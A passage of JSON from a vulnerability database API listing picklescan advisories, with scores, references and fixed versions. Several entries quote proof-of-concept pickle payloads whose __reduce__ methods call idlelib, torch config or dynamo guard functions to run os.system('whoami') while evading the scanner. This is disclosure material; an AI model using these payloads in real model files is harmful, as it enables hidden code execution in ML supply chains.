"VCID-fkcx-bkmd-4bbe" }, { "vulnerability": "VCID-fvhz-kyju-qkg5" }, { "vulnerability": "VCID-fxc2-cr37-fuhg" }, { "vulnerability": "VCID-gbvh-fs1r-xqcw" }, { "vulnerability": "VCID-hg5h-54nq-bber" }, { "vulnerability": "VCID-jsfv-qjzd-87ck" }, { "vulnerability": "VCID-judk-maax-muc7" }, { "vulnerability": "VCID-k92s-yfxv-hqhr" }, { "vulnerability": "VCID-p42h-2wne-j3ds" }, { "vulnerability": "VCID-pfmh-d33z-9ka8" }, { "vulnerability": "VCID-q3ju-z2ut-mkgx" }, { "vulnerability": "VCID-re4f-xefn-x7fb" }, { "vulnerability": "VCID-ssnp-77kf-qudn" }, { "vulnerability": "VCID-vgyv-ps7z-x7gc" }, { "vulnerability": "VCID-zh4p-1c3k-j3g8" }, { "vulnerability": "VCID-zhzt-rnfn-73ab" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/picklescan@0.0.30" } ], "aliases": [ "GHSA-xp4f-hrf8-rxw7" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-bepy-gm8w-83e5" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/115854?format=api", "vulnerability_id": "VCID-bgy1-36ca-fudc", "summary": "picklescan before 0.0.22 only considers standard pickle file extensions in the scope for its vulnerability scan. An attacker could craft a malicious model that uses Pickle and include a malicious pickle file with a non-standard file extension. Because the malicious pickle file inclusion is not considered as part of the scope of picklescan, the file would pass security checks and appear to be safe, when it could instead prove to be problematic.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2025-1889", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00057", "scoring_system": "epss", "scoring_elements": "0.18176", "published_at": "2026-06-12T12:55:00Z" }, { "value": "0.00057", "scoring_system": "epss", "scoring_elements": "0.18168", "published_at": "2026-06-14T12:55:00Z" }, { "value": "0.00057", "scoring_system": "epss", "scoring_elements": "0.18017", "published_at": "2026-06-11T12:55:00Z" }, { "value": "0.00057", "scoring_system": "epss", "scoring_elements": "0.18193", "published_at": "2026-06-13T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2025-1889" }, { "reference_url": "https://github.com/mmaitre314/picklescan", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/mmaitre314/picklescan" }, { "reference_url": "https://github.com/mmaitre314/picklescan/commit/baf03faf88fece56a89534d12ce048e5ee36e50e", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/mmaitre314/picklescan/commit/baf03faf88fece56a89534d12ce048e5ee36e50e" }, { "reference_url": "https://github.com/mmaitre314/picklescan/security/advisories/GHSA-769v-p64c-89pr", "reference_id": "", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/mmaitre314/picklescan/security/advisories/GHSA-769v-p64c-89pr" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2025-1889", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-1889" }, { "reference_url": "https://sites.google.com/sonatype.com/vulnerabilities/cve-2025-1889", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://sites.google.com/sonatype.com/vulnerabilities/cve-2025-1889" }, { "reference_url": "https://www.sonatype.com/security-advisories/cve-2025-1889", "reference_id": "cve-2025-1889", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2025-03-03T20:06:20Z/" } ], "url": "https://www.sonatype.com/security-advisories/cve-2025-1889" }, { "reference_url": "https://github.com/mmaitre314/picklescan/security/advisories/GHSA-655q-fx9r-782v", "reference_id": "GHSA-655q-fx9r-782v", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2025-03-03T20:06:20Z/" } ], "url": "https://github.com/mmaitre314/picklescan/security/advisories/GHSA-655q-fx9r-782v" }, { "reference_url": "https://github.com/advisories/GHSA-769v-p64c-89pr", "reference_id": "GHSA-769v-p64c-89pr", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-769v-p64c-89pr" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/87036?format=api", "purl": "pkg:pypi/picklescan@0.0.22", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1cce-4mst-r7h4" }, { "vulnerability": "VCID-1cft-ke16-8kac" }, { "vulnerability": "VCID-357d-3wwy-aubk" }, { "vulnerability": "VCID-38pp-fqgk-bygf" }, { "vulnerability": "VCID-3ykn-199q-u3hf" }, { "vulnerability": "VCID-46rw-3mfv-67ad" }, { "vulnerability": "VCID-4nda-nuz6-gqgm" }, { "vulnerability": "VCID-4u6x-5jg3-jbfx" }, { "vulnerability": "VCID-555e-6p5m-xbbc" }, { "vulnerability": "VCID-6723-ghp7-yqd1" }, { "vulnerability": "VCID-6pqf-4qcr-ckac" }, { "vulnerability": "VCID-6smr-kf6r-53gc" }, { "vulnerability": "VCID-7dgj-c6cm-v3bt" }, { "vulnerability": "VCID-7jv5-uxzs-cucb" }, { "vulnerability": "VCID-83zm-7pnx-gkag" }, { "vulnerability": "VCID-8bj4-tmz9-gyau" }, { "vulnerability": "VCID-8fwp-rcz9-byam" }, { "vulnerability": "VCID-8q15-7ur4-kkde" }, { "vulnerability": "VCID-a31m-q2ca-w7em" }, { "vulnerability": "VCID-av36-fvk2-23be" }, { "vulnerability": "VCID-ay9k-cbe6-wye5" }, { "vulnerability": "VCID-b4zf-mwfc-53bm" }, { "vulnerability": "VCID-b8nm-k5xu-yfc8" }, { "vulnerability": "VCID-bepy-gm8w-83e5" }, { "vulnerability": "VCID-brvs-drts-rbay" }, { "vulnerability": "VCID-c3as-vdkf-4fem" }, { "vulnerability": "VCID-c5rh-vbqs-q7bp" }, { "vulnerability": "VCID-cj2u-dmaj-wbd4" }, { "vulnerability": "VCID-cq25-8mmm-3yfg" }, { "vulnerability": "VCID-cupp-7ca3-wfa6" }, { "vulnerability": "VCID-czzc-g8zx-1kbq" }, { "vulnerability": "VCID-d1k5-6npz-2kcg" }, { "vulnerability": "VCID-d4vv-a8kx-5kdc" }, { "vulnerability": "VCID-dsy5-2z6e-jqds" }, { "vulnerability": "VCID-e95k-rym7-a7bk" }, { "vulnerability": "VCID-eub2-wr7z-c3e6" }, { "vulnerability": "VCID-fbng-xtyv-zqdf" }, { "vulnerability": "VCID-fkcx-bkmd-4bbe" }, { "vulnerability": "VCID-fsjg-pn1f-fqd6" }, { "vulnerability": "VCID-fvhz-kyju-qkg5" }, { "vulnerability": "VCID-fxc2-cr37-fuhg" }, { "vulnerability": "VCID-gbvh-fs1r-xqcw" }, { "vulnerability": "VCID-hg5h-54nq-bber" }, { "vulnerability": "VCID-hm3p-7t8t-bfb7" }, { "vulnerability": "VCID-jsfv-qjzd-87ck" }, { "vulnerability": "VCID-judk-maax-muc7" }, { "vulnerability": "VCID-k92s-yfxv-hqhr" }, { "vulnerability": "VCID-kmwg-e2gf-9yb7" }, { "vulnerability": "VCID-kne4-tcp8-m3c3" }, { "vulnerability": "VCID-n3yg-3gcp-nyc1" }, { "vulnerability": "VCID-p42h-2wne-j3ds" }, { "vulnerability": "VCID-pfmh-d33z-9ka8" }, { "vulnerability": "VCID-q3ju-z2ut-mkgx" }, { "vulnerability": "VCID-re4f-xefn-x7fb" }, { "vulnerability": "VCID-rqap-hdeb-1ffb" }, { "vulnerability": "VCID-ssnp-77kf-qudn" }, { "vulnerability": "VCID-v5yc-uwn3-akbc" }, { "vulnerability": "VCID-vgyv-ps7z-x7gc" }, { "vulnerability": "VCID-yvv5-7ah5-dfd8" }, { "vulnerability": "VCID-zh4p-1c3k-j3g8" }, { "vulnerability": "VCID-zhdd-ck3x-pbh7" }, { "vulnerability": "VCID-zhzt-rnfn-73ab" }, { "vulnerability": "VCID-zxc5-cgwk-qbcn" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/picklescan@0.0.22" } ], "aliases": [ "CVE-2025-1889", "GHSA-769v-p64c-89pr" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-bgy1-36ca-fudc" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/360635?format=api", "vulnerability_id": "VCID-brvs-drts-rbay", "summary": "Picklescan is missing detection when calling built-in python idlelib.pyshell.ModifiedInterpreter.runcommand\n### Summary\n\nUsing idlelib.pyshell.ModifiedInterpreter.runcommand function, which is a built-in python library function to execute remote pickle file.\n\n### Details\n\nThe attack payload executes in the following steps:\n\nFirst, the attacker craft the payload by calling to idlelib.pyshell.ModifiedInterpreter.runcommand function in reduce method\nThen when the victim after checking whether the pickle file is safe by using Picklescan library and this library doesn't dectect any dangerous functions, decide to pickle.load() this malicious pickle file, thus lead to remote code execution.\n\n### PoC\n\n```\nfrom idlelib.pyshell import ModifiedInterpreter\nfrom types import SimpleNamespace\n\nclass EvilIdlelibPyshellModifiedInterpreterRuncommand:\n def __reduce__(self):\n payload = \"__import__('os').system('whoami')\"\n fake_self = SimpleNamespace(\n locals={},\n tkconsole=SimpleNamespace(executing=False),\n rpcclt=None,\n debugger=None\n )\n return ModifiedInterpreter.runcommand, (fake_self, payload)\n\n```\n\n### Impact\n\nWho is impacted? Any organization or individual relying on picklescan to detect malicious pickle files inside PyTorch models.\nWhat is the impact? Attackers can embed malicious code in pickle file that remains undetected but executes when the pickle file is loaded.\nSupply Chain Attack: Attackers can distribute infected pickle files across ML models, APIs, or saved Python objects.\n\n### Corresponding\n\nhttps://github.com/FredericDT\nhttps://github.com/Qhaoduoyu", "references": [ { "reference_url": "https://github.com/mmaitre314/picklescan", "reference_id": "", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/mmaitre314/picklescan" }, { "reference_url": "https://github.com/mmaitre314/picklescan/commit/1931c2d04eaca8d20597705ff39cab78ba364e4b", "reference_id": "", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/mmaitre314/picklescan/commit/1931c2d04eaca8d20597705ff39cab78ba364e4b" }, { "reference_url": "https://github.com/mmaitre314/picklescan/security/advisories/GHSA-j343-8v2j-ff7w", "reference_id": "", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/mmaitre314/picklescan/security/advisories/GHSA-j343-8v2j-ff7w" }, { "reference_url": "https://github.com/advisories/GHSA-j343-8v2j-ff7w", "reference_id": "GHSA-j343-8v2j-ff7w", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-j343-8v2j-ff7w" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/89082?format=api", "purl": "pkg:pypi/picklescan@0.0.30", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-38pp-fqgk-bygf" }, { "vulnerability": "VCID-46rw-3mfv-67ad" }, { "vulnerability": "VCID-8fwp-rcz9-byam" }, { "vulnerability": "VCID-8q15-7ur4-kkde" }, { "vulnerability": "VCID-a31m-q2ca-w7em" }, { "vulnerability": "VCID-ay9k-cbe6-wye5" }, { "vulnerability": "VCID-c5rh-vbqs-q7bp" }, { "vulnerability": "VCID-cq25-8mmm-3yfg" }, { "vulnerability": "VCID-czzc-g8zx-1kbq" }, { "vulnerability": "VCID-e95k-rym7-a7bk" }, { "vulnerability": "VCID-fkcx-bkmd-4bbe" }, { "vulnerability": "VCID-fvhz-kyju-qkg5" }, { "vulnerability": "VCID-fxc2-cr37-fuhg" }, { "vulnerability": "VCID-gbvh-fs1r-xqcw" }, { "vulnerability": "VCID-hg5h-54nq-bber" }, { "vulnerability": "VCID-jsfv-qjzd-87ck" }, { "vulnerability": "VCID-judk-maax-muc7" }, { "vulnerability": "VCID-k92s-yfxv-hqhr" }, { "vulnerability": "VCID-p42h-2wne-j3ds" }, { "vulnerability": "VCID-pfmh-d33z-9ka8" }, { "vulnerability": "VCID-q3ju-z2ut-mkgx" }, { "vulnerability": "VCID-re4f-xefn-x7fb" }, { "vulnerability": "VCID-ssnp-77kf-qudn" }, { "vulnerability": "VCID-vgyv-ps7z-x7gc" }, { "vulnerability": "VCID-zh4p-1c3k-j3g8" }, { "vulnerability": "VCID-zhzt-rnfn-73ab" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/picklescan@0.0.30" } ], "aliases": [ "GHSA-j343-8v2j-ff7w" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-brvs-drts-rbay" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/360633?format=api", "vulnerability_id": "VCID-c3as-vdkf-4fem", "summary": "Picklescan missing detection when calling pytorch function torch.utils._config_module.load_config\n### Summary\n\nUsing torch.utils._config_module.load_config function, which is a pytorch library function to execute remote pickle file.\n\n### Details\n\nThe attack payload executes in the following steps:\n\nFirst, the attacker craft the payload by calling to torch.utils._config_module.load_config function in reduce method\nThen when the victim after checking whether the pickle file is safe by using Picklescan library and this library doesn't dectect any dangerous functions, decide to pickle.load() this malicious pickle file, thus lead to remote code execution.\n\n### PoC\n\n```\nimport pickle\nfrom torch.utils._config_module import ConfigModule\n\nclass Evil:\n def __reduce__(self):\n return (os.system, ('whoami',))\n\nclass EvilTorchUtilsConfigModuleLoadConfig:\n def __reduce__(self):\n evil_payload = pickle.dumps(Evil())\n return ConfigModule.load_config, (None, evil_payload)\n```\n\n### Impact\n\nWho is impacted? Any organization or individual relying on picklescan to detect malicious pickle files inside PyTorch models.\nWhat is the impact? Attackers can embed malicious code in pickle file that remains undetected but executes when the pickle file is loaded.\nSupply Chain Attack: Attackers can distribute infected pickle files across ML models, APIs, or saved Python objects.\n\n### Corresponding\n\nhttps://github.com/FredericDT\nhttps://github.com/Qhaoduoyu", "references": [ { "reference_url": "https://github.com/mmaitre314/picklescan", "reference_id": "", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/mmaitre314/picklescan" }, { "reference_url": "https://github.com/mmaitre314/picklescan/commit/7f994d62084fe43f1cffdef2f9bae6923344ef53", "reference_id": "", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/mmaitre314/picklescan/commit/7f994d62084fe43f1cffdef2f9bae6923344ef53" }, { "reference_url": "https://github.com/mmaitre314/picklescan/pull/47", "reference_id": "", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/mmaitre314/picklescan/pull/47" }, { "reference_url": "https://github.com/mmaitre314/picklescan/releases/tag/v0.0.28", "reference_id": "", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/mmaitre314/picklescan/releases/tag/v0.0.28" }, { "reference_url": "https://github.com/mmaitre314/picklescan/security/advisories/GHSA-vv6j-3g6g-2pvj", "reference_id": "", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/mmaitre314/picklescan/security/advisories/GHSA-vv6j-3g6g-2pvj" }, { "reference_url": "https://github.com/advisories/GHSA-vv6j-3g6g-2pvj", "reference_id": "GHSA-vv6j-3g6g-2pvj", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-vv6j-3g6g-2pvj" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/89080?format=api", "purl": "pkg:pypi/picklescan@0.0.28", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-357d-3wwy-aubk" }, { "vulnerability": "VCID-38pp-fqgk-bygf" }, { "vulnerability": "VCID-46rw-3mfv-67ad" }, { "vulnerability": "VCID-4nda-nuz6-gqgm" }, { "vulnerability": "VCID-555e-6p5m-xbbc" }, { "vulnerability": "VCID-6723-ghp7-yqd1" }, { "vulnerability": "VCID-6pqf-4qcr-ckac" }, { "vulnerability": "VCID-6smr-kf6r-53gc" }, { "vulnerability": "VCID-7dgj-c6cm-v3bt" }, { "vulnerability": "VCID-7jv5-uxzs-cucb" }, { "vulnerability": "VCID-83zm-7pnx-gkag" }, { "vulnerability": "VCID-8fwp-rcz9-byam" }, { "vulnerability": "VCID-8q15-7ur4-kkde" }, { "vulnerability": "VCID-a31m-q2ca-w7em" }, { "vulnerability": "VCID-ay9k-cbe6-wye5" }, { "vulnerability": "VCID-b4zf-mwfc-53bm" }, { "vulnerability": "VCID-b8nm-k5xu-yfc8" }, { "vulnerability": "VCID-bepy-gm8w-83e5" }, { "vulnerability": "VCID-brvs-drts-rbay" }, { "vulnerability": "VCID-c5rh-vbqs-q7bp" }, { "vulnerability": "VCID-cq25-8mmm-3yfg" }, { "vulnerability": "VCID-czzc-g8zx-1kbq" }, { "vulnerability": "VCID-d1k5-6npz-2kcg" }, { "vulnerability": "VCID-e95k-rym7-a7bk" }, { "vulnerability": "VCID-fbng-xtyv-zqdf" }, { "vulnerability": "VCID-fkcx-bkmd-4bbe" }, { "vulnerability": "VCID-fsjg-pn1f-fqd6" }, { "vulnerability": "VCID-fvhz-kyju-qkg5" }, { "vulnerability": "VCID-fxc2-cr37-fuhg" }, { "vulnerability": "VCID-gbvh-fs1r-xqcw" }, { "vulnerability": "VCID-hg5h-54nq-bber" }, { "vulnerability": "VCID-hm3p-7t8t-bfb7" }, { "vulnerability": "VCID-jsfv-qjzd-87ck" }, { "vulnerability": "VCID-judk-maax-muc7" }, { "vulnerability": "VCID-k92s-yfxv-hqhr" }, { "vulnerability": "VCID-kne4-tcp8-m3c3" }, { "vulnerability": "VCID-n3yg-3gcp-nyc1" }, { "vulnerability": "VCID-p42h-2wne-j3ds" }, { "vulnerability": "VCID-pfmh-d33z-9ka8" }, { "vulnerability": "VCID-q3ju-z2ut-mkgx" }, { "vulnerability": "VCID-re4f-xefn-x7fb" }, { "vulnerability": "VCID-ssnp-77kf-qudn" }, { "vulnerability": "VCID-v5yc-uwn3-akbc" }, { "vulnerability": "VCID-vgyv-ps7z-x7gc" }, { "vulnerability": "VCID-zh4p-1c3k-j3g8" }, { "vulnerability": "VCID-zhzt-rnfn-73ab" }, { "vulnerability": "VCID-zxc5-cgwk-qbcn" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/picklescan@0.0.28" } ], "aliases": [ "GHSA-vv6j-3g6g-2pvj" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-c3as-vdkf-4fem" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/212471?format=api", "vulnerability_id": "VCID-c5rh-vbqs-q7bp", "summary": "picklescan has Arbitrary file read using `io.FileIO`", "references": [ { "reference_url": "https://github.com/mmaitre314/picklescan", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:P" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/mmaitre314/picklescan" }, { "reference_url": "https://github.com/mmaitre314/picklescan/commit/a01c58d5dd7960db557b849817c0ab83ab111ef1", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:P" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/mmaitre314/picklescan/commit/a01c58d5dd7960db557b849817c0ab83ab111ef1" }, { "reference_url": "https://github.com/mmaitre314/picklescan/pull/55", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:P" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/mmaitre314/picklescan/pull/55" }, { "reference_url": "https://github.com/mmaitre314/picklescan/releases/tag/v0.0.35", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:P" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/mmaitre314/picklescan/releases/tag/v0.0.35" }, { "reference_url": "https://github.com/advisories/GHSA-9726-w42j-3qjr", "reference_id": "GHSA-9726-w42j-3qjr", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-9726-w42j-3qjr" }, { "reference_url": "https://github.com/mmaitre314/picklescan/security/advisories/GHSA-9726-w42j-3qjr", "reference_id": "GHSA-9726-w42j-3qjr", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "8.8", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:P" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/mmaitre314/picklescan/security/advisories/GHSA-9726-w42j-3qjr" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/36639?format=api", "purl": "pkg:pypi/picklescan@0.0.35", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-8fwp-rcz9-byam" }, { "vulnerability": "VCID-8q15-7ur4-kkde" }, { "vulnerability": "VCID-ay9k-cbe6-wye5" }, { "vulnerability": "VCID-czzc-g8zx-1kbq" }, { "vulnerability": "VCID-fkcx-bkmd-4bbe" }, { "vulnerability": "VCID-k92s-yfxv-hqhr" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/picklescan@0.0.35" } ], "aliases": [ "GHSA-9726-w42j-3qjr" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-c5rh-vbqs-q7bp" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/360656?format=api", "vulnerability_id": "VCID-cj2u-dmaj-wbd4", "summary": "Picklescan missing detection when calling pytorch function torch._dynamo.guards.GuardBuilder.get\n### Summary\n\nUsing torch._dynamo.guards.GuardBuilder.get function, which is a pytorch library function to execute remote pickle file.\n\n### Details\n\nThe attack payload executes in the following steps:\n\nFirst, the attacker craft the payload by calling to torch._dynamo.guards.GuardBuilder.get function in reduce method\nThen when the victim after checking whether the pickle file is safe by using Picklescan library and this library doesn't dectect any dangerous functions, decide to pickle.load() this malicious pickle file, thus lead to remote code execution.\n\n### PoC\n\n```\nimport types\nimport torch._dynamo.guards as guards\n\nclass EvilTorchDynamoGuardsGet:\n def __reduce__(self):\n fake_self = types.SimpleNamespace(scope={})\n name = \"__import__('os').system('whoami')\"\n return guards.GuardBuilder.get, (fake_self, name)\n```\n\n### Impact\n\nWho is impacted? Any organization or individual relying on picklescan to detect malicious pickle files inside PyTorch models.\nWhat is the impact? Attackers can embed malicious code in pickle file that remains undetected but executes when the pickle file is loaded.\nSupply Chain Attack: Attackers can distribute infected pickle files across ML models, APIs, or saved Python objects.\n\n### Corresponding\n\nhttps://github.com/FredericDT\nhttps://github.com/Qhaoduoyu", "references": [ { "reference_url": "https://github.com/mmaitre314/picklescan", "reference_id": "", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/mmaitre314/picklescan" }, { "reference_url": "https://github.com/mmaitre314/picklescan/commit/7f994d62084fe43f1cffdef2f9bae6923344ef53", "reference_id": "", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/mmaitre314/picklescan/commit/7f994d62084fe43f1cffdef2f9bae6923344ef53" }, { "reference_url": "https://github.com/mmaitre314/picklescan/pull/47", "reference_id": "", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/mmaitre314/picklescan/pull/47" }, { "reference_url": "https://github.com/mmaitre314/picklescan/releases/tag/v0.0.28", "reference_id": "", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/mmaitre314/picklescan/releases/tag/v0.0.28" }, { "reference_url": "https://github.com/mmaitre314/picklescan/security/advisories/GHSA-86cj-95qr-2p4f", "reference_id": "", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/mmaitre314/picklescan/security/advisories/GHSA-86cj-95qr-2p4f" }, { "reference_url": "https://github.com/advisories/GHSA-86cj-95qr-2p4f", "reference_id": "GHSA-86cj-95qr-2p4f", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-86cj-95qr-2p4f" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/89080?format=api", "purl": "pkg:pypi/picklescan@0.0.28", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-357d-3wwy-aubk" }, { "vulnerability": "VCID-38pp-fqgk-bygf" }, { "vulnerability": "VCID-46rw-3mfv-67ad" }, { "vulnerability": "VCID-4nda-nuz6-gqgm" }, { "vulnerability": "VCID-555e-6p5m-xbbc" }, { "vulnerability": "VCID-6723-ghp7-yqd1" }, { "vulnerability": "VCID-6pqf-4qcr-ckac" }, { "vulnerability": "VCID-6smr-kf6r-53gc" }, { "vulnerability": "VCID-7dgj-c6cm-v3bt" }, { "vulnerability": "VCID-7jv5-uxzs-cucb" }, { "vulnerability": "VCID-83zm-7pnx-gkag" }, { "vulnerability": "VCID-8fwp-rcz9-byam" }, { "vulnerability": "VCID-8q15-7ur4-kkde" }, { "vulnerability": "VCID-a31m-q2ca-w7em" }, { "vulnerability": "VCID-ay9k-cbe6-wye5" }, { "vulnerability": "VCID-b4zf-mwfc-53bm" }, { "vulnerability": "VCID-b8nm-k5xu-yfc8" }, { "vulnerability": "VCID-bepy-gm8w-83e5" }, { "vulnerability": "VCID-brvs-drts-rbay" }, { "vulnerability": "VCID-c5rh-vbqs-q7bp" }, { "vulnerability": "VCID-cq25-8mmm-3yfg" }, { "vulnerability": "VCID-czzc-g8zx-1kbq" }, { "vulnerability": "VCID-d1k5-6npz-2kcg" }, { "vulnerability": "VCID-e95k-rym7-a7bk" }, { "vulnerability": "VCID-fbng-xtyv-zqdf" }, { "vulnerability": "VCID-fkcx-bkmd-4bbe" 